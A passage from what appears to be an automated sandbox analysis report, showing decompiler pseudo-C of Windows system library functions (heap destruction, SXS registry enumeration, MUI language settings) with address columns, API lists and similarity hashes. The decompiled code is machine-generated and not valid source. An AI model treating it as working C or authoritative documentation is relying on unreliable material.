							_t96 = _v76;
							_t109 = E6B1DF018(_t96,  &_v60,  &_v68, _t92,  &_v72);
							L9:
							if(_t109 != 0xc0000034) {
								_t105 = _v56;
								if(_t105 != 0) {
									if(_t109 != 0x80000005) {
										_t109 = 0xc0000034;
									} else {
										_t107 = _t105 + 1 >> 1;
										if(_a8 != _t92) {
											_t94 = _a12;
											if( *_t94 >= _t107) {
												_push(_t96);
												_t109 = E6B1DF018(_v60,  &_v44,  &_v52, _a8,  &_v56);
												if(_t109 < 0) {
													goto L17;
												} else {
													if(_v56 == 7) {
														goto L16;
													} else {
														_t109 = 0xc0000034;
														goto L17;
													}
												}
												L29:
											} else {
												_t109 = 0xc0000023;
												L16:
												 *_t94 = _t107;
											}
											L17:
											_t92 = 0;
										} else {
											_t109 = _t92;
											 *_a12 = _t107;
										}
									}
								}
							}
						}
					}
				}
				_t61 = _v40;
				if(_t61 != 0) {
					if(_t61 != 0xffffffff) {
						 *0x6b1b6cc4(_t61);
					}
					_v40 = _t92;
				}
				if(_v52 != 0) {
					_push(_v52);
					E6B2195D0();
				}
				return _t109;
				goto L29;
			}


























                                                                                                                            0x6b28cf82
                                                                                                                            0x6b28cf8c
                                                                                                                            0x6b28cf91
                                                                                                                            0x6b28cf96
                                                                                                                            0x6b28cf9a
                                                                                                                            0x6b28cf9e
                                                                                                                            0x6b28cfa7
                                                                                                                            0x6b28cfab
                                                                                                                            0x6b28cfb9
                                                                                                                            0x6b28cfe1
                                                                                                                            0x6b28cfea
                                                                                                                            0x6b28cff4
                                                                                                                            0x6b28cff5
                                                                                                                            0x6b28cffd
                                                                                                                            0x6b28cffe
                                                                                                                            0x6b28d007
                                                                                                                            0x6b28d00b
                                                                                                                            0x6b28d00c
                                                                                                                            0x6b28d010
                                                                                                                            0x6b28d018
                                                                                                                            0x6b28d01c
                                                                                                                            0x6b28d025
                                                                                                                            0x6b28d029
                                                                                                                            0x6b28d05d
                                                                                                                            0x6b28d063
                                                                                                                            0x00000000
                                                                                                                            0x6b28d069
                                                                                                                            0x6b28d069
                                                                                                                            0x6b28d06d
                                                                                                                            0x6b28d07b
                                                                                                                            0x6b28d080
                                                                                                                            0x6b28d085
                                                                                                                            0x6b28d089
                                                                                                                            0x00000000
                                                                                                                            0x6b28d089
                                                                                                                            0x6b28d02b
                                                                                                                            0x6b28d035
                                                                                                                            0x6b28d03a
                                                                                                                            0x6b28d03b
                                                                                                                            0x6b28d053
                                                                                                                            0x6b28d057
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28d057
                                                                                                                            0x6b28cfbb
                                                                                                                            0x6b28cfc1
                                                                                                                            0x6b28cfca
                                                                                                                            0x6b28cfd2
                                                                                                                            0x6b28d08d
                                                                                                                            0x6b28d091
                                                                                                                            0x6b28d095
                                                                                                                            0x6b28d09d
                                                                                                                            0x6b28d09e
                                                                                                                            0x6b28d0a7
                                                                                                                            0x6b28d0af
                                                                                                                            0x6b28d0b0
                                                                                                                            0x6b28d0b4
                                                                                                                            0x6b28d0bd
                                                                                                                            0x6b28d0c1
                                                                                                                            0x6b28d0cd
                                                                                                                            0x6b28d0d2
                                                                                                                            0x6b28d0d3
                                                                                                                            0x6b28d0eb
                                                                                                                            0x6b28d0ed
                                                                                                                            0x6b28d0f4
                                                                                                                            0x6b28d0f6
                                                                                                                            0x6b28d0fc
                                                                                                                            0x6b28d104
                                                                                                                            0x6b28d18d
                                                                                                                            0x6b28d10a
                                                                                                                            0x6b28d10b
                                                                                                                            0x6b28d110
                                                                                                                            0x6b28d11b
                                                                                                                            0x6b28d120
                                                                                                                            0x6b28d15e
                                                                                                                            0x6b28d179
                                                                                                                            0x6b28d17d
                                                                                                                            0x00000000
                                                                                                                            0x6b28d17f
                                                                                                                            0x6b28d184
                                                                                                                            0x00000000
                                                                                                                            0x6b28d186
                                                                                                                            0x6b28d186
                                                                                                                            0x00000000
                                                                                                                            0x6b28d186
                                                                                                                            0x6b28d184
                                                                                                                            0x00000000
                                                                                                                            0x6b28d122
                                                                                                                            0x6b28d122
                                                                                                                            0x6b28d127
                                                                                                                            0x6b28d127
                                                                                                                            0x6b28d127
                                                                                                                            0x6b28d129
                                                                                                                            0x6b28d129
                                                                                                                            0x6b28d112
                                                                                                                            0x6b28d115
                                                                                                                            0x6b28d117
                                                                                                                            0x6b28d117
                                                                                                                            0x6b28d110
                                                                                                                            0x6b28d104
                                                                                                                            0x6b28d0fc
                                                                                                                            0x6b28d0f4
                                                                                                                            0x6b28d0c1
                                                                                                                            0x6b28cfb9
                                                                                                                            0x6b28d12b
                                                                                                                            0x6b28d131
                                                                                                                            0x6b28d136
                                                                                                                            0x6b28d139
                                                                                                                            0x6b28d139
                                                                                                                            0x6b28d13f
                                                                                                                            0x6b28d13f
                                                                                                                            0x6b28d148
                                                                                                                            0x6b28d14a
                                                                                                                            0x6b28d14e
                                                                                                                            0x6b28d14e
                                                                                                                            0x6b28d15b
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1DF108: RtlOpenCurrentUser.1105(02000000,00000000,?,00000000,02000000,?,6B28CFA7,?,?,?), ref: 6B1DF12C
                                                                                                                            • RtlInitUnicodeString.1105(?,Control Panel\Desktop,?,?,?), ref: 6B28CFC1
                                                                                                                            • RtlInitUnicodeString.1105(?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28CFE1
                                                                                                                            • ZwOpenKey.1105(?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D020
                                                                                                                            • RtlInitUnicodeString.1105(?,MachinePreferredUILanguages,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D035
                                                                                                                            • ZwClose.1105(?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D06D
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D080
                                                                                                                            • ZwOpenKey.1105(00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6B28D0B8
                                                                                                                            • RtlInitUnicodeString.1105(?,PreferredUILanguages,00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached), ref: 6B28D0CD
                                                                                                                            • ZwClose.1105(?,?,?,?), ref: 6B28D139
                                                                                                                            • ZwClose.1105(00000000,?,?,?), ref: 6B28D14E
                                                                                                                            Strings
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 6B28D072
                                                                                                                            • Control Panel\Desktop, xrefs: 6B28CFBB
                                                                                                                            • PreferredUILanguages, xrefs: 6B28D0C3
                                                                                                                            • Control Panel\Desktop\MuiCached, xrefs: 6B28CFDB
                                                                                                                            • MachinePreferredUILanguages, xrefs: 6B28D02B
                                                                                                                            • @, xrefs: 6B28D0A7
                                                                                                                            • @, xrefs: 6B28D010
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicode$CloseOpen$CurrentUser
                                                                                                                            • String ID: @$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 3208599939-2289709611
                                                                                                                            • Opcode ID: 474ac19e9edeeb22e05e60c112c1b0d71c5279d8898f1cab0c55893f55e944bf
                                                                                                                            • Instruction ID: 93574b62251c91dc68b73e6860bdccd3566a8017aa689b4761dd853dd7224118
                                                                                                                            • Opcode Fuzzy Hash: 474ac19e9edeeb22e05e60c112c1b0d71c5279d8898f1cab0c55893f55e944bf
                                                                                                                            • Instruction Fuzzy Hash: 90514571948309AFC711CF25C8C0A4BB7E8BF89754F004A2EF994A7250D738DA0DCB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D2FB0, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 262timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E6B1D2FB0(intOrPtr* _a4) {
				signed int _v8;
				void* _v36;
				void* _v62;
				void* _v68;
				void* _v72;
				signed int _v96;
				void* _v98;
				char _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t62;
				intOrPtr _t64;
				signed int* _t83;
				signed int _t84;
				signed int _t88;
				char* _t89;
				char _t93;
				void* _t99;
				signed int* _t102;
				intOrPtr _t103;
				void* _t104;
				signed int* _t107;
				signed int _t108;
				char* _t115;
				signed int _t118;
				signed int _t124;
				void* _t125;
				void* _t126;
				signed int _t127;
				intOrPtr* _t128;
				void* _t135;
				intOrPtr _t137;
				intOrPtr* _t159;
				void* _t160;
				void* _t162;
				intOrPtr* _t164;
				void* _t167;
				signed int* _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x64;
				_v8 =  *0x6b2cd360 ^ _t174;
				_push(_t125);
				_t159 = _a4;
				if(_t159 == 0) {
					__eflags =  *0x6b2c8748 - 2;
					if( *0x6b2c8748 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E6B1DB150();
						} else {
							E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E6B1DB150();
						__eflags =  *0x6b2c7bc8;
						if(__eflags == 0) {
							_t135 = 2;
							E6B292073(_t125, _t135, _t159, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t160);
					_pop(_t162);
					_pop(_t126);
					return E6B21B640(_t62, _t126, _v8 ^ _t174, _t155, _t160, _t162);
				}
				if( *((intOrPtr*)(_t159 + 8)) == 0xddeeddee) {
					_t137 =  *[fs:0x30];
					__eflags = _t159 -  *((intOrPtr*)(_t137 + 0x18));
					if(_t159 ==  *((intOrPtr*)(_t137 + 0x18))) {
						L30:
						_t62 = _t159;
						goto L27;
					}
					_t138 =  *(_t159 + 0x20);
					__eflags =  *(_t159 + 0x20);
					if( *(_t159 + 0x20) != 0) {
						_t155 = _t159;
						E6B27CB1E(_t138, _t159, 0, 8, 0);
					}
					E6B1D31B0(_t125, _t159, _t155);
					E6B29274F(_t159);
					_t155 = 1;
					E6B201249(_t159, 1, 0, 0);
					E6B29B581(_t159);
					goto L26;
				}
				if(( *(_t159 + 0x44) & 0x01000000) != 0) {
					_t164 =  *0x6b2c5718; // 0x0
					 *0x6b2cb1e0(_t159);
					_t62 =  *_t164();
					goto L27;
				}
				_t144 =  *((intOrPtr*)(_t159 + 0x58));
				if( *((intOrPtr*)(_t159 + 0x58)) != 0) {
					_t155 = _t159;
					E6B27CB1E(_t144, _t159, 0, 8, 0);
				}
				E6B1D31B0(_t125, _t159, _t155);
				if(( *(_t159 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t159 + 0x40) & 0x10000000;
					if(( *(_t159 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t124 = E6B293518(_t159);
					__eflags = _t124;
					if(_t124 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t159 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						_t155 = 1;
						E6B201249(_t159, 1, 0, 0);
						_t83 = _t159 + 0x9c;
						_t127 =  *_t83;
						while(_t83 != _t127) {
							_t84 = _t127;
							_t155 =  &_v96;
							_t127 =  *_t127;
							_v96 = _t84 & 0xffff0000;
							_v100 = 0;
							E6B20174B( &_v96,  &_v100, 0x8000);
							_t88 = E6B1F7D50();
							__eflags = _t88;
							if(_t88 == 0) {
								_t89 = 0x7ffe0388;
							} else {
								_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t89;
							if(__eflags != 0) {
								_t155 = _v96;
								E6B28FE3F(_t159, _v96, _v100);
							}
							_t83 = _t159 + 0x9c;
						}
						if( *((char*)(_t159 + 0xda)) == 2) {
							_t93 =  *((intOrPtr*)(_t159 + 0xd4));
						} else {
							_t93 = 0;
						}
						if(_t93 != 0) {
							 *((intOrPtr*)(_t174 + 0x1c)) = _t93;
							_t155 = _t174 + 0x1c;
							 *((intOrPtr*)(_t174 + 0x1c)) = 0;
							E6B20174B(_t174 + 0x1c, _t174 + 0x1c, 0x8000);
						}
						_t128 = _t159 + 0x88;
						if( *_t128 != 0) {
							 *((intOrPtr*)(_t174 + 0x24)) = 0;
							_t155 = _t128;
							E6B20174B(_t128, _t174 + 0x24, 0x8000);
							 *_t128 = 0;
						}
						if(( *(_t159 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t159 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t167 =  *((intOrPtr*)(_t159 + 0xa8)) - 0x10;
						E6B1D3138(_t167);
						if(_t167 != _t159) {
							goto L16;
						} else {
							_t99 = E6B1F7D50();
							_t168 = 0x7ffe0380;
							if(_t99 != 0) {
								_t102 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t102 = 0x7ffe0380;
							}
							if( *_t102 != 0) {
								_t103 =  *[fs:0x30];
								__eflags =  *(_t103 + 0x240) & 0x00000001;
								if(( *(_t103 + 0x240) & 0x00000001) != 0) {
									_t118 = E6B1F7D50();
									__eflags = _t118;
									if(_t118 != 0) {
										_t168 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t168;
									}
									 *((short*)(_t174 + 0x2a)) = 0x1023;
									_push(_t174 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t168 & 0x000000ff);
									 *((intOrPtr*)(_t174 + 0x54)) = _t159;
									E6B219AE0();
								}
							}
							_t104 = E6B1F7D50();
							_t169 = 0x7ffe038a;
							if(_t104 != 0) {
								_t107 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t107 = 0x7ffe038a;
							}
							if( *_t107 != 0) {
								_t108 = E6B1F7D50();
								__eflags = _t108;
								if(_t108 != 0) {
									_t169 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t169;
								}
								 *((short*)(_t174 + 0x4e)) = 0x1023;
								_push(_t174 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t169 & 0x000000ff);
								 *((intOrPtr*)(_t174 + 0x78)) = _t159;
								E6B219AE0();
							}
							if(E6B1F7D50() != 0) {
								_t115 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t115 = 0x7ffe0388;
							}
							if( *_t115 != 0) {
								E6B28FDD3(_t159);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                                                                            0x6b1d2fb8
                                                                                                                            0x6b1d2fc2
                                                                                                                            0x6b1d2fc6
                                                                                                                            0x6b1d2fc9
                                                                                                                            0x6b1d2fce
                                                                                                                            0x6b22fb7d
                                                                                                                            0x6b22fb84
                                                                                                                            0x6b22fb8a
                                                                                                                            0x6b22fb90
                                                                                                                            0x6b22fb94
                                                                                                                            0x6b22fbb3
                                                                                                                            0x6b22fbb8
                                                                                                                            0x6b22fb96
                                                                                                                            0x6b22fbab
                                                                                                                            0x6b22fbb0
                                                                                                                            0x6b22fbbe
                                                                                                                            0x6b22fbc3
                                                                                                                            0x6b22fbc8
                                                                                                                            0x6b22fbd0
                                                                                                                            0x6b22fbd8
                                                                                                                            0x6b22fbd9
                                                                                                                            0x6b22fbd9
                                                                                                                            0x6b22fbd0
                                                                                                                            0x6b1d30ea
                                                                                                                            0x6b1d30ea
                                                                                                                            0x6b1d30ec
                                                                                                                            0x6b1d30f0
                                                                                                                            0x6b1d30f1
                                                                                                                            0x6b1d30f2
                                                                                                                            0x6b1d30fd
                                                                                                                            0x6b1d30fd
                                                                                                                            0x6b1d2fdb
                                                                                                                            0x6b22fbe3
                                                                                                                            0x6b22fbea
                                                                                                                            0x6b22fbed
                                                                                                                            0x6b1d312b
                                                                                                                            0x6b1d312b
                                                                                                                            0x00000000
                                                                                                                            0x6b1d312b
                                                                                                                            0x6b22fbf3
                                                                                                                            0x6b22fbf8
                                                                                                                            0x6b22fbfa
                                                                                                                            0x6b22fc00
                                                                                                                            0x6b22fc02
                                                                                                                            0x6b22fc02
                                                                                                                            0x6b22fc09
                                                                                                                            0x6b22fc10
                                                                                                                            0x6b22fc1b
                                                                                                                            0x6b22fc1c
                                                                                                                            0x6b22fc23
                                                                                                                            0x00000000
                                                                                                                            0x6b22fc23
                                                                                                                            0x6b1d2fe8
                                                                                                                            0x6b22fc2d
                                                                                                                            0x6b22fc36
                                                                                                                            0x6b22fc3c
                                                                                                                            0x00000000
                                                                                                                            0x6b22fc3c
                                                                                                                            0x6b1d2fee
                                                                                                                            0x6b1d2ff5
                                                                                                                            0x6b22fc47
                                                                                                                            0x6b22fc49
                                                                                                                            0x6b22fc49
                                                                                                                            0x6b1d2ffd
                                                                                                                            0x6b1d3009
                                                                                                                            0x6b22fc53
                                                                                                                            0x6b22fc5a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22fc62
                                                                                                                            0x6b22fc67
                                                                                                                            0x6b22fc69
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d300f
                                                                                                                            0x6b1d300f
                                                                                                                            0x6b1d3018
                                                                                                                            0x00000000
                                                                                                                            0x6b1d301e
                                                                                                                            0x6b1d3024
                                                                                                                            0x6b1d3025
                                                                                                                            0x6b1d302a
                                                                                                                            0x6b1d3030
                                                                                                                            0x6b1d3032
                                                                                                                            0x6b22fc74
                                                                                                                            0x6b22fc76
                                                                                                                            0x6b22fc7a
                                                                                                                            0x6b22fc81
                                                                                                                            0x6b22fc8f
                                                                                                                            0x6b22fc93
                                                                                                                            0x6b22fc98
                                                                                                                            0x6b22fc9d
                                                                                                                            0x6b22fc9f
                                                                                                                            0x6b22fcb1
                                                                                                                            0x6b22fca1
                                                                                                                            0x6b22fcaa
                                                                                                                            0x6b22fcaa
                                                                                                                            0x6b22fcb6
                                                                                                                            0x6b22fcb9
                                                                                                                            0x6b22fcbf
                                                                                                                            0x6b22fcc5
                                                                                                                            0x6b22fcc5
                                                                                                                            0x6b22fcca
                                                                                                                            0x6b22fcca
                                                                                                                            0x6b1d3041
                                                                                                                            0x6b1d3100
                                                                                                                            0x6b1d3047
                                                                                                                            0x6b1d3047
                                                                                                                            0x6b1d3047
                                                                                                                            0x6b1d304b
                                                                                                                            0x6b1d310b
                                                                                                                            0x6b1d310f
                                                                                                                            0x6b1d311c
                                                                                                                            0x6b1d3121
                                                                                                                            0x6b1d3121
                                                                                                                            0x6b1d3051
                                                                                                                            0x6b1d3059
                                                                                                                            0x6b22fcde
                                                                                                                            0x6b22fce3
                                                                                                                            0x6b22fce5
                                                                                                                            0x6b22fcea
                                                                                                                            0x6b22fcea
                                                                                                                            0x6b1d3063
                                                                                                                            0x6b1d3075
                                                                                                                            0x6b1d3075
                                                                                                                            0x00000000
                                                                                                                            0x6b1d307b
                                                                                                                            0x6b1d3081
                                                                                                                            0x6b1d3086
                                                                                                                            0x6b1d308d
                                                                                                                            0x00000000
                                                                                                                            0x6b1d308f
                                                                                                                            0x6b1d308f
                                                                                                                            0x6b1d3094
                                                                                                                            0x6b1d30a0
                                                                                                                            0x6b22fcfa
                                                                                                                            0x6b1d30a6
                                                                                                                            0x6b1d30a6
                                                                                                                            0x6b1d30a6
                                                                                                                            0x6b1d30ab
                                                                                                                            0x6b22fd01
                                                                                                                            0x6b22fd07
                                                                                                                            0x6b22fd0e
                                                                                                                            0x6b22fd14
                                                                                                                            0x6b22fd19
                                                                                                                            0x6b22fd1b
                                                                                                                            0x6b22fd26
                                                                                                                            0x6b22fd26
                                                                                                                            0x6b22fd26
                                                                                                                            0x6b22fd2f
                                                                                                                            0x6b22fd38
                                                                                                                            0x6b22fd39
                                                                                                                            0x6b22fd3b
                                                                                                                            0x6b22fd43
                                                                                                                            0x6b22fd44
                                                                                                                            0x6b22fd48
                                                                                                                            0x6b22fd48
                                                                                                                            0x6b22fd0e
                                                                                                                            0x6b1d30b1
                                                                                                                            0x6b1d30b6
                                                                                                                            0x6b1d30c2
                                                                                                                            0x6b22fd5b
                                                                                                                            0x6b1d30c8
                                                                                                                            0x6b1d30c8
                                                                                                                            0x6b1d30c8
                                                                                                                            0x6b1d30cd
                                                                                                                            0x6b22fd62
                                                                                                                            0x6b22fd67
                                                                                                                            0x6b22fd69
                                                                                                                            0x6b22fd74
                                                                                                                            0x6b22fd74
                                                                                                                            0x6b22fd74
                                                                                                                            0x6b22fd7d
                                                                                                                            0x6b22fd86
                                                                                                                            0x6b22fd87
                                                                                                                            0x6b22fd89
                                                                                                                            0x6b22fd91
                                                                                                                            0x6b22fd92
                                                                                                                            0x6b22fd96
                                                                                                                            0x6b22fd96
                                                                                                                            0x6b1d30da
                                                                                                                            0x6b22fda9
                                                                                                                            0x6b1d30e0
                                                                                                                            0x6b1d30e0
                                                                                                                            0x6b1d30e0
                                                                                                                            0x6b1d30e8
                                                                                                                            0x6b1d3131
                                                                                                                            0x6b1d3131
                                                                                                                            0x00000000
                                                                                                                            0x6b1d30e8
                                                                                                                            0x6b1d308d
                                                                                                                            0x6b1d3018

                                                                                                                            APIs
                                                                                                                            • RtlDeleteCriticalSection.1105(?,00000000,00008000), ref: 6B1D3070
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,00008000), ref: 6B1D308F
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D30B1
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D30D3
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B22FBAB
                                                                                                                            • DbgPrint.1105((HeapHandle != NULL)), ref: 6B22FBC3
                                                                                                                            • RtlDebugPrintTimes.1105(?), ref: 6B22FC36
                                                                                                                              • Part of subcall function 6B1D31B0: RtlAcquireSRWLockExclusive.1105(6B2C8660,?,00000000,6B22FC0E), ref: 6B1D31BC
                                                                                                                              • Part of subcall function 6B1D31B0: RtlReleaseSRWLockExclusive.1105(6B2C8660,6B2C8660,?,00000000,6B22FC0E), ref: 6B1D31CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentPrintServiceSession$ExclusiveLock$AcquireCriticalDebugDeleteReleaseSectionTimes
                                                                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 1992993584-3610490719
                                                                                                                            • Opcode ID: f67ed47ae4b0c53671fde5672d22dea844a86b225d84675faa03d148ebacfc10
                                                                                                                            • Instruction ID: 0bcfd800e67c39a86feb98051d8b84f1f77387781c36ed62a3e29ef280a68483
                                                                                                                            • Opcode Fuzzy Hash: f67ed47ae4b0c53671fde5672d22dea844a86b225d84675faa03d148ebacfc10
                                                                                                                            • Instruction Fuzzy Hash: 3C912171744655EFD325CB38C885B2BB7E5BF89B04F004999E9449B380DB3CE846CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20CCC0, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 218nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 74%
                                                                                                                            			E6B20CCC0(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				int _v596;
				signed int _v600;
				void* _v608;
				void* _v612;
				signed int _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t103;
				void* _t104;
				intOrPtr _t107;
				void* _t110;
				void* _t111;
				void* _t117;
				int _t121;
				signed int* _t124;
				void* _t125;
				signed int _t129;
				signed int _t131;

				_t131 = (_t129 & 0xfffffff8) - 0x25c;
				_v8 =  *0x6b2cd360 ^ _t131;
				_t103 = _a8;
				_t124 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x6b1b13a8;
					_v564 = 0;
					_v560 = 0;
					_t79 = E6B219600();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t103 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E6B265720(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x6b1b13a8);
						 *((char*)(_t103 + 0x1c)) = 1;
						L36:
						_t131 = _t131 + 0x14;
						if(_t124 == 0) {
							L9:
							_pop(_t117);
							_pop(_t125);
							_pop(_t104);
							return E6B21B640(_t80, _t104, _v8 ^ _t131, _t113, _t117, _t125);
						}
						_t80 = _v608;
						L38:
						 *_t124 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
					_t80 = _t82;
					if(_t80 == 0 &&  *_t103 != _t80) {
						_push( *_t103);
						_t80 = E6B2195D0();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t103 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t107 =  *_t103;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t107;
						_v584 = 0;
						_v596 = _t80;
						if(_t107 == 0) {
							L30:
							 *((char*)(_t103 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t113 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t107);
						_t80 = E6B219820();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t103 + 8)) = 1;
								if(_t124 != 0) {
									 *_t124 = 0xc0000106;
								}
								goto L9;
							}
							_t113 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E6B264A28(_v608,  &_v592, _t103 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E6B265720(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t103 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L30;
						}
						_push(_t80);
						_t80 = E6B265720(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t131 = _t131 + 0x14;
						 *((char*)(_t103 + 8)) = 1;
						if(_t124 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					RtlInitUnicodeString( &_v608, E6B1EAAB0());
					_t113 = _v616 & 0x0000ffff;
					 *(_t103 + 0xc) = 0;
					_t27 = _t113 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t103 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t103 + 8)) = 1;
						if(_t124 != 0) {
							 *_t124 = 0xc0000023;
						}
						goto L9;
					}
					memcpy( *(_t103 + 0x10), _v612, _t113);
					_t131 = _t131 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v616 + 0x10;
					L8:
					 *(_t103 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t121 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t121;
				_t9 = _t121 + 0x10; // 0x6b1e6177
				_t110 = _t9;
				if(_t110 > 0xfffe) {
					goto L20;
				}
